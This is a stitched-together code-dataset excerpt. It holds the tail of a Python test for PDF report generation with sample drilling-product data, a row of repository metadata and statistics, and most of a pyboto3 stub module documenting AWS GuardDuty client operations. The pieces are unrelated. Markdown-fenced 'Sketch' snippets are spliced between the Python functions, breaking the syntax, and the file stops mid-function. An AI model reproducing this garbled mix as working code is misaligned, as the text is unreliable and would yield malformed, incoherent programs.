11.649962921657089,
11.649962921657089,
11.649962921657089,
11.649962921657089,
11.649962921657089,
11.649962921657089,
11.649962921657089,
11.649962921657089,
11.649962921657089,
11.649962921657089,
11.649962921657089,
11.649962921657089,
11.649962921657089,
11.616263088138906,
11.616263088138906,
11.616263088138906,
11.145731745164484,
11.145731745164484,
11.145731745164484,
11.145731745164484,
11.145731745164484,
11.145731745164484,
11.145731745164484,
11.145731745164484,
11.145731745164484,
11.145731745164484,
10.634358227132175,
10.634358227132175,
10.396491622667979,
10.396491622667979,
10.396491622667979,
10.396491622667979,
10.396491622667979,
10.396491622667979,
10.396491622667979,
10.396491622667979,
10.396491622667979,
],
"pillVolume": 10,
"pillDensity": 350,
"bridgingMode": "PERMEABILITY",
"bridgingValue": 500,
"weighting": {"bridge": 5, "mass": 5, "products": 5},
"products": {
"b": {"id": "baracarb150", "value": 45, "percentage": 12},
"c": {"id": "supercom", "value": 88, "percentage": 12},
"d": {"id": "compound-V", "value": 77, "percentage": 12},
"e": {"id": "tight-seal", "value": 5, "percentage": 12},
"f": {"id": "tighterfit", "value": 6, "percentage": 12},
"g": {"id": "Compund-B", "value": 56, "percentage": 12},
},
"totalMass": 3500,
"email": "test@equinor.com",
"user": "Test Testson",
}
class ReportTest(unittest.TestCase):
    @staticmethod
    def test_create_report():
        create_report(request, bridge=False)
        result = Path(f"{Config.HOME_DIR}/report.pdf")
        # Check that the file was created
        assert result.is_file()
        # Check that the file has a minimum size of 30 KB
        assert result.stat().st_size > 30000
| 28.070796 | 66 | 0.600147 | 737 | 9,516 | 7.739484 | 0.187246 | 0.092391 | 0.103261 | 0.178822 | 0.806101 | 0.779628 | 0.767707 | 0.767707 | 0.767707 | 0.752454 | 0 | 0.776706 | 0.313367 | 9,516 | 338 | 67 | 28.153846 | 0.096266 | 0.007146 | 0 | 0.870482 | 0 | 0 | 0.036527 | 0.002965 | 0 | 0 | 0 | 0 | 0.006024 | 1 | 0.003012 | false | 0 | 0.012048 | 0 | 0.018072 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
e7b1ea7e52e2857bcb9379a269e5ff1816c7850d | 134,767 | py | Python | pyboto3/guardduty.py | gehad-shaat/pyboto3 | 4a0c2851a8bc04fb1c71c36086f7bb257e48181d | [
"MIT"
] | 91 | 2016-12-31T11:38:37.000Z | 2021-09-16T19:33:23.000Z | pyboto3/guardduty.py | gehad-shaat/pyboto3 | 4a0c2851a8bc04fb1c71c36086f7bb257e48181d | [
"MIT"
] | 7 | 2017-01-02T18:54:23.000Z | 2020-08-11T13:54:02.000Z | pyboto3/guardduty.py | gehad-shaat/pyboto3 | 4a0c2851a8bc04fb1c71c36086f7bb257e48181d | [
"MIT"
] | 26 | 2016-12-31T13:11:00.000Z | 2022-03-03T21:01:12.000Z | '''
The MIT License (MIT)
Copyright (c) 2016 WavyCloud
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
'''
def accept_invitation(DetectorId=None, MasterId=None, InvitationId=None):
    """
Accepts the invitation to be monitored by a master GuardDuty account.
See also: AWS API Documentation
Exceptions
:example: response = client.accept_invitation(
DetectorId='string',
MasterId='string',
InvitationId='string'
)
:type DetectorId: string
:param DetectorId: [REQUIRED]\nThe unique ID of the detector of the GuardDuty member account.\n
:type MasterId: string
:param MasterId: [REQUIRED]\nThe account ID of the master GuardDuty account whose invitation you\'re accepting.\n
:type InvitationId: string
:param InvitationId: [REQUIRED]\nThe value that is used to validate the master account to the member account.\n
:rtype: dict
ReturnsResponse Syntax
{}
Response Structure
(dict) --
Exceptions
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
:return: {}
:returns:
(dict) --
    """
    pass
def archive_findings(DetectorId=None, FindingIds=None):
    """
Archives GuardDuty findings that are specified by the list of finding IDs.
See also: AWS API Documentation
Exceptions
:example: response = client.archive_findings(
DetectorId='string',
FindingIds=[
'string',
]
)
:type DetectorId: string
:param DetectorId: [REQUIRED]\nThe ID of the detector that specifies the GuardDuty service whose findings you want to archive.\n
:type FindingIds: list
:param FindingIds: [REQUIRED]\nThe IDs of the findings that you want to archive.\n\n(string) --\n\n
:rtype: dict
ReturnsResponse Syntax
{}
Response Structure
(dict) --
Exceptions
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
:return: {}
:returns:
(dict) --
    """
    pass
def can_paginate(operation_name=None):
    """
Check if an operation can be paginated.
:type operation_name: string
:param operation_name: The operation name. This is the same name\nas the method name on the client. For example, if the\nmethod name is create_foo, and you\'d normally invoke the\noperation as client.create_foo(**kwargs), if the\ncreate_foo operation can be paginated, you can use the\ncall client.get_paginator('create_foo').
    """
    pass
def create_detector(Enable=None, ClientToken=None, FindingPublishingFrequency=None, Tags=None):
    """
Creates a single Amazon GuardDuty detector. A detector is a resource that represents the GuardDuty service. To start using GuardDuty, you must create a detector in each Region where you enable the service. You can have only one detector per account per Region.
See also: AWS API Documentation
Exceptions
:example: response = client.create_detector(
Enable=True|False,
ClientToken='string',
FindingPublishingFrequency='FIFTEEN_MINUTES'|'ONE_HOUR'|'SIX_HOURS',
Tags={
'string': 'string'
}
)
:type Enable: boolean
:param Enable: [REQUIRED]\nA Boolean value that specifies whether the detector is to be enabled.\n
:type ClientToken: string
:param ClientToken: The idempotency token for the create request.\nThis field is autopopulated if not provided.\n
:type FindingPublishingFrequency: string
:param FindingPublishingFrequency: An enum value that specifies how frequently updated findings are exported.
:type Tags: dict
:param Tags: The tags to be added to a new detector resource.\n\n(string) --\n(string) --\n\n\n\n
:rtype: dict
ReturnsResponse Syntax
{
'DetectorId': 'string'
}
Response Structure
(dict) --
DetectorId (string) --
The unique ID of the created detector.
Exceptions
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
:return: {
'DetectorId': 'string'
}
:returns:
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
    """
    pass
def create_filter(DetectorId=None, Name=None, Description=None, Action=None, Rank=None, FindingCriteria=None, ClientToken=None, Tags=None):
    """
Creates a filter using the specified finding criteria.
See also: AWS API Documentation
Exceptions
:example: response = client.create_filter(
DetectorId='string',
Name='string',
Description='string',
Action='NOOP'|'ARCHIVE',
Rank=123,
FindingCriteria={
'Criterion': {
'string': {
'Eq': [
'string',
],
'Neq': [
'string',
],
'Gt': 123,
'Gte': 123,
'Lt': 123,
'Lte': 123,
'Equals': [
'string',
],
'NotEquals': [
'string',
],
'GreaterThan': 123,
'GreaterThanOrEqual': 123,
'LessThan': 123,
'LessThanOrEqual': 123
}
}
},
ClientToken='string',
Tags={
'string': 'string'
}
)
:type DetectorId: string
:param DetectorId: [REQUIRED]\nThe unique ID of the detector of the GuardDuty account that you want to create a filter for.\n
:type Name: string
:param Name: [REQUIRED]\nThe name of the filter.\n
:type Description: string
:param Description: The description of the filter.
:type Action: string
:param Action: Specifies the action that is to be applied to the findings that match the filter.
:type Rank: integer
:param Rank: Specifies the position of the filter in the list of current filters. Also specifies the order in which this filter is applied to the findings.
:type FindingCriteria: dict
:param FindingCriteria: [REQUIRED]\nRepresents the criteria to be used in the filter for querying findings.\nYou can only use the following attributes to query findings:\n\naccountId\nregion\nconfidence\nid\nresource.accessKeyDetails.accessKeyId\nresource.accessKeyDetails.principalId\nresource.accessKeyDetails.userName\nresource.accessKeyDetails.userType\nresource.instanceDetails.iamInstanceProfile.id\nresource.instanceDetails.imageId\nresource.instanceDetails.instanceId\nresource.instanceDetails.outpostArn\nresource.instanceDetails.networkInterfaces.ipv6Addresses\nresource.instanceDetails.networkInterfaces.privateIpAddresses.privateIpAddress\nresource.instanceDetails.networkInterfaces.publicDnsName\nresource.instanceDetails.networkInterfaces.publicIp\nresource.instanceDetails.networkInterfaces.securityGroups.groupId\nresource.instanceDetails.networkInterfaces.securityGroups.groupName\nresource.instanceDetails.networkInterfaces.subnetId\nresource.instanceDetails.networkInterfaces.vpcId\nresource.instanceDetails.tags.key\nresource.instanceDetails.tags.value\nresource.resourceType\nservice.action.actionType\nservice.action.awsApiCallAction.api\nservice.action.awsApiCallAction.callerType\nservice.action.awsApiCallAction.remoteIpDetails.city.cityName\nservice.action.awsApiCallAction.remoteIpDetails.country.countryName\nservice.action.awsApiCallAction.remoteIpDetails.ipAddressV4\nservice.action.awsApiCallAction.remoteIpDetails.organization.asn\nservice.action.awsApiCallAction.remoteIpDetails.organization.asnOrg\nservice.action.awsApiCallAction.serviceName\nservice.action.dnsRequestAction.domain\nservice.action.networkConnectionAction.blocked\nservice.action.networkConnectionAction.connectionDirection\nservice.action.networkConnectionAction.localPortDetails.port\nservice.action.networkConnectionAction.protocol\nservice.action.networkConnectionAction.localIpDetails.ipAddressV4\nservice.action.networkConnectionAction.remoteIpDetails.city.cityName\nservice.action.networkConnectionAction.remoteIpDetails.country.countryName\nservice.action.networkConnectionAction.remoteIpDetails.ipAddressV4\nservice.action.networkConnectionAction.remoteIpDetails.organization.asn\nservice.action.networkConnectionAction.remoteIpDetails.organization.asnOrg\nservice.action.networkConnectionAction.remotePortDetails.port\nservice.additionalInfo.threatListName\nservice.archived When this attribute is set to TRUE, only archived findings are listed. When it\'s set to FALSE, only unarchived findings are listed. When this attribute is not set, all existing findings are listed.\nservice.resourceRole\nseverity\ntype\nupdatedAt Type: ISO 8601 string format: YYYY-MM-DDTHH:MM:SS.SSSZ or YYYY-MM-DDTHH:MM:SSZ depending on whether the value contains milliseconds.\n\n\nCriterion (dict) --Represents a map of finding properties that match specified conditions and values when querying findings.\n\n(string) --\n(dict) --Contains information about the condition.\n\nEq (list) --Represents the equal condition to be applied to a single field when querying for findings.\n\n(string) --\n\n\nNeq (list) --Represents the not equal condition to be applied to a single field when querying for findings.\n\n(string) --\n\n\nGt (integer) --Represents a greater than condition to be applied to a single field when querying for findings.\n\nGte (integer) --Represents a greater than or equal condition to be applied to a single field when querying for findings.\n\nLt (integer) --Represents a less than condition to be applied to a single field when querying for findings.\n\nLte (integer) --Represents a less than or equal condition to be applied to a single field when querying for findings.\n\nEquals (list) --Represents an equal condition to be applied to a single field when querying for findings.\n\n(string) --\n\n\nNotEquals (list) --Represents a not equal condition to be applied to a single field when querying for findings.\n\n(string) --\n\n\nGreaterThan (integer) --Represents a greater than condition to be applied to a single field when querying for findings.\n\nGreaterThanOrEqual (integer) --Represents a greater than or equal condition to be applied to a single field when querying for findings.\n\nLessThan (integer) --Represents a less than condition to be applied to a single field when querying for findings.\n\nLessThanOrEqual (integer) --Represents a less than or equal condition to be applied to a single field when querying for findings.\n\n\n\n\n\n\n\n\n
:type ClientToken: string
:param ClientToken: The idempotency token for the create request.\nThis field is autopopulated if not provided.\n
:type Tags: dict
:param Tags: The tags to be added to a new filter resource.\n\n(string) --\n(string) --\n\n\n\n
:rtype: dict
Response Syntax
{
'Name': 'string'
}
Response Structure
(dict) --
Name (string) --
The name of the successfully created filter.
Exceptions
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
:return: {
'Name': 'string'
}
:returns:
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
"""
pass
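# Sketch (not part of the generated stub): a FindingCriteria argument for
# create_filter can be assembled as a plain dict using the queryable
# attributes listed above. The helper name and the threshold of 7 are
# illustrative assumptions, not AWS defaults.

```python
def build_finding_criteria(min_severity, archived=False):
    # Build a FindingCriteria dict matching findings at or above
    # min_severity with the given archived state. 'severity' and
    # 'service.archived' are documented queryable attributes.
    return {
        'Criterion': {
            'severity': {'GreaterThanOrEqual': min_severity},
            'service.archived': {'Equals': [str(archived).lower()]},
        }
    }

criteria = build_finding_criteria(7)
```

The resulting dict would be passed as `FindingCriteria=criteria` to `create_filter` on a live client.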
def create_ip_set(DetectorId=None, Name=None, Format=None, Location=None, Activate=None, ClientToken=None, Tags=None):
"""
Creates a new IPSet, which is called a trusted IP list in the console user interface. An IPSet is a list of IP addresses that are trusted for secure communication with AWS infrastructure and applications. GuardDuty doesn't generate findings for IP addresses that are included in IPSets. Only users from the master account can use this operation.
See also: AWS API Documentation
Exceptions
:example: response = client.create_ip_set(
DetectorId='string',
Name='string',
Format='TXT'|'STIX'|'OTX_CSV'|'ALIEN_VAULT'|'PROOF_POINT'|'FIRE_EYE',
Location='string',
Activate=True|False,
ClientToken='string',
Tags={
'string': 'string'
}
)
:type DetectorId: string
:param DetectorId: [REQUIRED]\nThe unique ID of the detector of the GuardDuty account that you want to create an IPSet for.\n
:type Name: string
:param Name: [REQUIRED]\nThe user-friendly name to identify the IPSet.\nAllowed characters are alphanumerics, spaces, hyphens (-), and underscores (_).\n
:type Format: string
:param Format: [REQUIRED]\nThe format of the file that contains the IPSet.\n
:type Location: string
:param Location: [REQUIRED]\nThe URI of the file that contains the IPSet.\n
:type Activate: boolean
:param Activate: [REQUIRED]\nA Boolean value that indicates whether GuardDuty is to start using the uploaded IPSet.\n
:type ClientToken: string
:param ClientToken: The idempotency token for the create request.\nThis field is autopopulated if not provided.\n
:type Tags: dict
:param Tags: The tags to be added to a new IP set resource.\n\n(string) --\n(string) --\n\n\n\n
:rtype: dict
Response Syntax
{
'IpSetId': 'string'
}
Response Structure
(dict) --
IpSetId (string) --
The ID of the IPSet resource.
Exceptions
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
:return: {
'IpSetId': 'string'
}
:returns:
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
"""
pass
def create_members(DetectorId=None, AccountDetails=None):
"""
Creates member accounts of the current AWS account by specifying a list of AWS account IDs. The current AWS account can then invite these members to manage GuardDuty in their accounts.
See also: AWS API Documentation
Exceptions
:example: response = client.create_members(
DetectorId='string',
AccountDetails=[
{
'AccountId': 'string',
'Email': 'string'
},
]
)
:type DetectorId: string
:param DetectorId: [REQUIRED]\nThe unique ID of the detector of the GuardDuty account that you want to associate member accounts with.\n
:type AccountDetails: list
:param AccountDetails: [REQUIRED]\nA list of account ID and email address pairs of the accounts that you want to associate with the master GuardDuty account.\n\n(dict) --Contains information about the account.\n\nAccountId (string) -- [REQUIRED]The member account ID.\n\nEmail (string) -- [REQUIRED]The email address of the member account.\n\n\n\n\n
:rtype: dict
Response Syntax
{
'UnprocessedAccounts': [
{
'AccountId': 'string',
'Result': 'string'
},
]
}
Response Structure
(dict) --
UnprocessedAccounts (list) --
A list of objects that include the accountIds of the unprocessed accounts and a result string that explains why each was unprocessed.
(dict) --
Contains information about the accounts that weren't processed.
AccountId (string) --
The AWS account ID.
Result (string) --
A reason why the account hasn't been processed.
Exceptions
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
:return: {
'UnprocessedAccounts': [
{
'AccountId': 'string',
'Result': 'string'
},
]
}
:returns:
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
"""
pass
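# Sketch (not part of the generated stub): create_members accepts a bounded
# batch of accounts per request (50 at the time of writing; verify against
# current AWS limits), so a large AccountDetails list is typically split into
# chunks before calling the operation. The helper name and batch size are
# illustrative assumptions.

```python
def chunk_account_details(account_details, batch_size=50):
    # Yield successive batches of {'AccountId': ..., 'Email': ...} dicts,
    # sized to fit one create_members call each.
    for i in range(0, len(account_details), batch_size):
        yield account_details[i:i + batch_size]

# Example: 120 hypothetical accounts split into batches of 50, 50, and 20.
accounts = [{'AccountId': str(n).zfill(12),
             'Email': 'member{}@example.com'.format(n)}
            for n in range(120)]
batches = list(chunk_account_details(accounts))
```

Each batch would then be passed as `AccountDetails` in its own `create_members` call, collecting `UnprocessedAccounts` from every response.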
def create_publishing_destination(DetectorId=None, DestinationType=None, DestinationProperties=None, ClientToken=None):
"""
Creates a publishing destination to export findings to. The resource to export findings to must exist before you use this operation.
See also: AWS API Documentation
Exceptions
:example: response = client.create_publishing_destination(
DetectorId='string',
DestinationType='S3',
DestinationProperties={
'DestinationArn': 'string',
'KmsKeyArn': 'string'
},
ClientToken='string'
)
:type DetectorId: string
:param DetectorId: [REQUIRED]\nThe ID of the GuardDuty detector associated with the publishing destination.\n
:type DestinationType: string
:param DestinationType: [REQUIRED]\nThe type of resource for the publishing destination. Currently only Amazon S3 buckets are supported.\n
:type DestinationProperties: dict
:param DestinationProperties: [REQUIRED]\nThe properties of the publishing destination, including the ARNs for the destination and the KMS key used for encryption.\n\nDestinationArn (string) --The ARN of the resource to publish to.\n\nKmsKeyArn (string) --The ARN of the KMS key to use for encryption.\n\n\n
:type ClientToken: string
:param ClientToken: The idempotency token for the request.\nThis field is autopopulated if not provided.\n
:rtype: dict
Response Syntax
{
'DestinationId': 'string'
}
Response Structure
(dict) --
DestinationId (string) --
The ID of the publishing destination that is created.
Exceptions
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
:return: {
'DestinationId': 'string'
}
:returns:
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
"""
pass
def create_sample_findings(DetectorId=None, FindingTypes=None):
"""
Generates example findings of types specified by the list of finding types. If 'NULL' is specified for findingTypes, the API generates example findings of all supported finding types.
See also: AWS API Documentation
Exceptions
:example: response = client.create_sample_findings(
DetectorId='string',
FindingTypes=[
'string',
]
)
:type DetectorId: string
:param DetectorId: [REQUIRED]\nThe ID of the detector to create sample findings for.\n
:type FindingTypes: list
:param FindingTypes: The types of sample findings to generate.\n\n(string) --\n\n
:rtype: dict
Response Syntax
{}
Response Structure
(dict) --
Exceptions
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
:return: {}
:returns:
(dict) --
"""
pass
def create_threat_intel_set(DetectorId=None, Name=None, Format=None, Location=None, Activate=None, ClientToken=None, Tags=None):
"""
Creates a new ThreatIntelSet. ThreatIntelSets consist of known malicious IP addresses. GuardDuty generates findings based on ThreatIntelSets. Only users of the master account can use this operation.
See also: AWS API Documentation
Exceptions
:example: response = client.create_threat_intel_set(
DetectorId='string',
Name='string',
Format='TXT'|'STIX'|'OTX_CSV'|'ALIEN_VAULT'|'PROOF_POINT'|'FIRE_EYE',
Location='string',
Activate=True|False,
ClientToken='string',
Tags={
'string': 'string'
}
)
:type DetectorId: string
:param DetectorId: [REQUIRED]\nThe unique ID of the detector of the GuardDuty account that you want to create a threatIntelSet for.\n
:type Name: string
:param Name: [REQUIRED]\nA user-friendly ThreatIntelSet name displayed in all findings that are generated by activity that involves IP addresses included in this ThreatIntelSet.\n
:type Format: string
:param Format: [REQUIRED]\nThe format of the file that contains the ThreatIntelSet.\n
:type Location: string
:param Location: [REQUIRED]\nThe URI of the file that contains the ThreatIntelSet.\n
:type Activate: boolean
:param Activate: [REQUIRED]\nA Boolean value that indicates whether GuardDuty is to start using the uploaded ThreatIntelSet.\n
:type ClientToken: string
:param ClientToken: The idempotency token for the create request.\nThis field is autopopulated if not provided.\n
:type Tags: dict
:param Tags: The tags to be added to a new threat list resource.\n\n(string) --\n(string) --\n\n\n\n
:rtype: dict
Response Syntax
{
'ThreatIntelSetId': 'string'
}
Response Structure
(dict) --
ThreatIntelSetId (string) --
The ID of the ThreatIntelSet resource.
Exceptions
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
:return: {
'ThreatIntelSetId': 'string'
}
:returns:
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
"""
pass
def decline_invitations(AccountIds=None):
"""
Declines invitations sent to the current member account by AWS accounts specified by their account IDs.
See also: AWS API Documentation
Exceptions
:example: response = client.decline_invitations(
AccountIds=[
'string',
]
)
:type AccountIds: list
:param AccountIds: [REQUIRED]\nA list of account IDs of the AWS accounts that sent invitations to the current member account that you want to decline invitations from.\n\n(string) --\n\n
:rtype: dict
Response Syntax
{
'UnprocessedAccounts': [
{
'AccountId': 'string',
'Result': 'string'
},
]
}
Response Structure
(dict) --
UnprocessedAccounts (list) --A list of objects that contain the unprocessed account and a result string that explains why it was unprocessed.
(dict) --Contains information about the accounts that weren't processed.
AccountId (string) --The AWS account ID.
Result (string) --A reason why the account hasn't been processed.
Exceptions
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
:return: {
'UnprocessedAccounts': [
{
'AccountId': 'string',
'Result': 'string'
},
]
}
:returns:
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
"""
pass
def delete_detector(DetectorId=None):
"""
Deletes an Amazon GuardDuty detector that is specified by the detector ID.
See also: AWS API Documentation
Exceptions
:example: response = client.delete_detector(
DetectorId='string'
)
:type DetectorId: string
:param DetectorId: [REQUIRED]\nThe unique ID of the detector that you want to delete.\n
:rtype: dict
Response Syntax
{}
Response Structure
(dict) --
Exceptions
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
:return: {}
:returns:
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
"""
pass
def delete_filter(DetectorId=None, FilterName=None):
"""
Deletes the filter specified by the filter name.
See also: AWS API Documentation
Exceptions
:example: response = client.delete_filter(
DetectorId='string',
FilterName='string'
)
:type DetectorId: string
:param DetectorId: [REQUIRED]\nThe unique ID of the detector that the filter is associated with.\n
:type FilterName: string
:param FilterName: [REQUIRED]\nThe name of the filter that you want to delete.\n
:rtype: dict
Response Syntax
{}
Response Structure
(dict) --
Exceptions
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
:return: {}
:returns:
(dict) --
"""
pass
def delete_invitations(AccountIds=None):
"""
Deletes invitations sent to the current member account by AWS accounts specified by their account IDs.
See also: AWS API Documentation
Exceptions
:example: response = client.delete_invitations(
AccountIds=[
'string',
]
)
:type AccountIds: list
:param AccountIds: [REQUIRED]\nA list of account IDs of the AWS accounts that sent invitations to the current member account that you want to delete invitations from.\n\n(string) --\n\n
:rtype: dict
Response Syntax
{
'UnprocessedAccounts': [
{
'AccountId': 'string',
'Result': 'string'
},
]
}
Response Structure
(dict) --
UnprocessedAccounts (list) --A list of objects that contain the unprocessed account and a result string that explains why it was unprocessed.
(dict) --Contains information about the accounts that weren't processed.
AccountId (string) --The AWS account ID.
Result (string) --A reason why the account hasn't been processed.
Exceptions
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
:return: {
'UnprocessedAccounts': [
{
'AccountId': 'string',
'Result': 'string'
},
]
}
:returns:
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
"""
pass
def delete_ip_set(DetectorId=None, IpSetId=None):
"""
Deletes the IPSet specified by the ipSetId. IPSets are called trusted IP lists in the console user interface.
See also: AWS API Documentation
Exceptions
:example: response = client.delete_ip_set(
DetectorId='string',
IpSetId='string'
)
:type DetectorId: string
:param DetectorId: [REQUIRED]\nThe unique ID of the detector associated with the IPSet.\n
:type IpSetId: string
:param IpSetId: [REQUIRED]\nThe unique ID of the IPSet to delete.\n
:rtype: dict
Response Syntax
{}
Response Structure
(dict) --
Exceptions
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
:return: {}
:returns:
(dict) --
"""
pass
def delete_members(DetectorId=None, AccountIds=None):
"""
Deletes GuardDuty member accounts (of the current GuardDuty master account) specified by the account IDs.
See also: AWS API Documentation
Exceptions
:example: response = client.delete_members(
DetectorId='string',
AccountIds=[
'string',
]
)
:type DetectorId: string
:param DetectorId: [REQUIRED]\nThe unique ID of the detector of the GuardDuty account whose members you want to delete.\n
:type AccountIds: list
:param AccountIds: [REQUIRED]\nA list of account IDs of the GuardDuty member accounts that you want to delete.\n\n(string) --\n\n
:rtype: dict
Response Syntax
{
'UnprocessedAccounts': [
{
'AccountId': 'string',
'Result': 'string'
},
]
}
Response Structure
(dict) --
UnprocessedAccounts (list) --
The accounts that could not be processed.
(dict) --
Contains information about the accounts that weren't processed.
AccountId (string) --
The AWS account ID.
Result (string) --
A reason why the account hasn't been processed.
Exceptions
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
:return: {
'UnprocessedAccounts': [
{
'AccountId': 'string',
'Result': 'string'
},
]
}
:returns:
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
"""
pass
def delete_publishing_destination(DetectorId=None, DestinationId=None):
"""
Deletes the publishing definition with the specified destinationId.
See also: AWS API Documentation
Exceptions
:example: response = client.delete_publishing_destination(
DetectorId='string',
DestinationId='string'
)
:type DetectorId: string
:param DetectorId: [REQUIRED]\nThe unique ID of the detector associated with the publishing destination to delete.\n
:type DestinationId: string
:param DestinationId: [REQUIRED]\nThe ID of the publishing destination to delete.\n
:rtype: dict
Response Syntax
{}
Response Structure
(dict) --
Exceptions
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
:return: {}
:returns:
(dict) --
"""
pass
def delete_threat_intel_set(DetectorId=None, ThreatIntelSetId=None):
"""
Deletes the ThreatIntelSet specified by the ThreatIntelSet ID.
See also: AWS API Documentation
Exceptions
:example: response = client.delete_threat_intel_set(
DetectorId='string',
ThreatIntelSetId='string'
)
:type DetectorId: string
:param DetectorId: [REQUIRED]\nThe unique ID of the detector that the threatIntelSet is associated with.\n
:type ThreatIntelSetId: string
:param ThreatIntelSetId: [REQUIRED]\nThe unique ID of the threatIntelSet that you want to delete.\n
:rtype: dict
Response Syntax
{}
Response Structure
(dict) --
Exceptions
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
:return: {}
:returns:
(dict) --
"""
pass
def describe_organization_configuration(DetectorId=None):
"""
Returns information about the account selected as the delegated administrator for GuardDuty.
See also: AWS API Documentation
Exceptions
:example: response = client.describe_organization_configuration(
DetectorId='string'
)
:type DetectorId: string
:param DetectorId: [REQUIRED]\nThe ID of the detector to retrieve information about the delegated administrator from.\n
:rtype: dict
Response Syntax
{
'AutoEnable': True|False,
'MemberAccountLimitReached': True|False
}
Response Structure
(dict) --
AutoEnable (boolean) --Indicates whether GuardDuty is automatically enabled for accounts added to the organization.
MemberAccountLimitReached (boolean) --Indicates whether the maximum number of allowed member accounts has already been associated with the delegated administrator master account.
Exceptions
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
:return: {
'AutoEnable': True|False,
'MemberAccountLimitReached': True|False
}
"""
pass
def describe_publishing_destination(DetectorId=None, DestinationId=None):
"""
Returns information about the publishing destination specified by the provided destinationId.
See also: AWS API Documentation
Exceptions
:example: response = client.describe_publishing_destination(
DetectorId='string',
DestinationId='string'
)
:type DetectorId: string
:param DetectorId: [REQUIRED]\nThe unique ID of the detector associated with the publishing destination to retrieve.\n
:type DestinationId: string
:param DestinationId: [REQUIRED]\nThe ID of the publishing destination to retrieve.\n
:rtype: dict
Response Syntax
{
'DestinationId': 'string',
'DestinationType': 'S3',
'Status': 'PENDING_VERIFICATION'|'PUBLISHING'|'UNABLE_TO_PUBLISH_FIX_DESTINATION_PROPERTY'|'STOPPED',
'PublishingFailureStartTimestamp': 123,
'DestinationProperties': {
'DestinationArn': 'string',
'KmsKeyArn': 'string'
}
}
Response Structure
(dict) --
DestinationId (string) --
The ID of the publishing destination.
DestinationType (string) --
The type of publishing destination. Currently, only Amazon S3 buckets are supported.
Status (string) --
The status of the publishing destination.
PublishingFailureStartTimestamp (integer) --
The time, in epoch millisecond format, at which GuardDuty was first unable to publish findings to the destination.
DestinationProperties (dict) --
A DestinationProperties object that includes the DestinationArn and KmsKeyArn of the publishing destination.
DestinationArn (string) --
The ARN of the resource to publish to.
KmsKeyArn (string) --
The ARN of the KMS key to use for encryption.
Exceptions
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
:return: {
'DestinationId': 'string',
'DestinationType': 'S3',
'Status': 'PENDING_VERIFICATION'|'PUBLISHING'|'UNABLE_TO_PUBLISH_FIX_DESTINATION_PROPERTY'|'STOPPED',
'PublishingFailureStartTimestamp': 123,
'DestinationProperties': {
'DestinationArn': 'string',
'KmsKeyArn': 'string'
}
}
:returns:
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
"""
pass
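# Sketch (not part of the generated stub): interpret the Status field of a
# describe_publishing_destination response. The status strings are taken
# from the response syntax above; the helper name is hypothetical.

```python
def destination_health(destination):
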